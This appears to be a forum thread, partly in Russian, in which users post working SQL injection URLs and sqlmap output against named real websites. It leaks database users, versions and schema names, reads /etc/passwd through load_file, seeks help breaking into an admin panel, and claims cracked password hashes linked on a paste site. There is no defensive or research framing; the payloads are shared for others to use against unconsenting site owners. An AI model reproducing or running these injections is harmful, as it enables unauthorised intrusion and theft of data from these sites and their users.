target: http://atmarine.fi type: Error-Based user: [email protected] db: 5.5.51-MariaDB Code: http://atmarine.fi/index.php?id=2 AND (SELECT 2796 FROM(SELECT COUNT(*),CONCAT_WS(CHAR(32,58,32),user(),database(),version(),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a) target: http://www.ubraintv.com type: Union-Based user: ubraintv@localhost db: 5.1.73 MySQL Code: http://www.ubraintv.com/watchchannel.php?id=6' UNION ALL SELECT 1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),4,5,6,7-- -
www.yorgasmic.com/article.php?id=148 Code: --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=148 AND 3436=3436 Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: id=148 OR (SELECT 2443 FROM(SELECT COUNT(*),CONCAT(0x71766a6271,(SELECT (ELT(2443=2443,1))),0x7178706b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: id=148 AND SLEEP(5) ---
ALEXA 12,361 Code: http://singtao.ca/events/Thatcher/article.php?ID=1+union+all+select+null,null,null,load_file('/etc/passwd'),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--
http://www.aseanmarketplace.net/featured-listings.php?id= Code: --- Parameter: id (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: id=-2582 OR 5132=5132 Type: AND/OR time-based blind Title: MySQL time-based blind - Parameter replace (MAKE_SET) Payload: id=MAKE_SET(8180=8180,SLEEP(5)) --- available databases [2]: [*] amp [*] information_schema Table: admin [1 entry] +----+----------+----------------------------------+ | id | username | password | +----+----------+----------------------------------+ | 1 | читаем | первый пост | +----+----------+----------------------------------+ в админпанельку как бы попасть в /administrator не пускает... как быть - мож кто подскажет....
Code: http://bw-plast.com/en/news.php?id=-2+union+select+1,2,3,4,version(),user(),7,database(),9,10,11,12,13,14-- Code: http://www.jmtv.com/news.php?id=-3+union+select+1,version(),database()--
Code: http://plasticospardo.com/english/noticias.php?id=-16+union+select+1,2,version(),4,database(),user(),7--
PHP: http://manul.tv/watch_video.php?v=R6DW4G16RRS8%27+and+false+union+select+database(),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0+--+-
target: http://illan-gifts.ru type: Error-Based user: wapp@localhost version: 5.5.52-MariaDB Code: http://illan-gifts.ru/1'and(ExtractValue(1,concat(0x5c,(user()))))and'
Code: http://www.jamestrussart.com/gallery.php?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11 Выводится 2 номер.
Code: https://c2-europe.eu/news-full.php?id=-1049+union+select+1,2,3,version(),5,6,database(),8,9,10,user(),12,13,14-- Code: http://monroerec.com/event.php?id=-24%27+UnIOn+SeLEcT+1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+--+
Code: https://www.unique-vintage.com/apps/swymEmails/interfaces/interfaceStore.php?appname=Emails Parameter: appname (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: appname=Emails' AND 8893=8893-- ZiPX --- [12:48:01] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL 5 available databases [5]: [*] information_schema [*] mysql [*] pbcomput_swym [*] performance_schema [*] sys
Code: https://www.mato-gmbh.com/produkte/mview'and(extractvalue(null,concat(1,(select+user()))))='1/251/?PHPSESSID=99f3768df8485b713f55dc60de16c1aa
DA49 Code: https://www.bfz.de/seminarfinder?the_id=13&zieg_id=-8+union+select+1,2,3,4,5,6,7,8,@@version,10,11,12,13,14,15,16,17+--+&foern_id=1&vanort=&umkreis=10&stichwort=&sort=entf&submitted=1 Microsoft SQL Server 2008 R2 (SP3)
http://www.elektronika.ru/index.php...s(0x3a3a,version(),user(),database()),3,4,6-- 5.5.52-MariaDB::edbuser@localhost::elektronika
Биржа крипты, слепая инъекция. Code: sqlmap -u "https://www.ccnex.com/index.php?before_group=3&c=member_controller&m=upgrade&now_group=5&s=help&username=if" -p "username" --dbms=mysql --level=3 --risk=3 --random-agent --dbs
Code: http://top.magreklama.ru/ Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=260 AND 9312=9312 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: id=260 AND SLEEP(5) Type: UNION query Title: Generic UNION query (NULL) - 1 column Payload: id=-3254 UNION ALL SELECT CONCAT(0x71766a6a71,0x686e626c4b547a41514a7841524666765564447557656e73737257757144446b4845694370475458,0x717a767871)-- Tzua --- web server operating system: Linux Ubuntu web application technology: Nginx, PHP 5.3.10 back-end DBMS: MySQL >= 5.0.12 --- web server operating system: Linux Ubuntu web application technology: Nginx, PHP 5.3.10 back-end DBMS: MySQL >= 5.0.12 Расшифрованные хеши из таблицы rekl_kv_naozero.users виде hashass http://zalil.su/6334652
Code: ТЕКОМ - является динамично развивающейся телекоммуникационной компанией, накопившей солидный опыт в области проектирования, поставках и монтаже оборудования связи, а также предоставляющей услуги связи и доступа в Интернет. Мы предлагаем нашим клиентам эффективное и оперативное решение возникающих задач, связанных с организацией телефонной связи и эксплуатацией телекоммуникационного оборудования. Code: http://www.tecom.ru/internet.php?id=-3+union+select+1,version(),database()-- Писал админам, но им оказалось похер на всё, так что решил выложить сюда... P.S. Также там есть ещё Административный Интерфейс CommuniGate Pro Code: http://81.3.154.236:8010/Master/MainAdmin/
Code: https://www.thecatching.com/news.php?id=-41+union+select+1,2,3,4,5,6,7,8,9-- Code: https://www.thecatching.com/news.php?id=-41+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9-- Code: https://www.thecatching.com/news.php?id=-41+union+select+1,2,3,table_name,5,6,7,8,9+from+information_schema.tables+limit%201,1-- поменял...
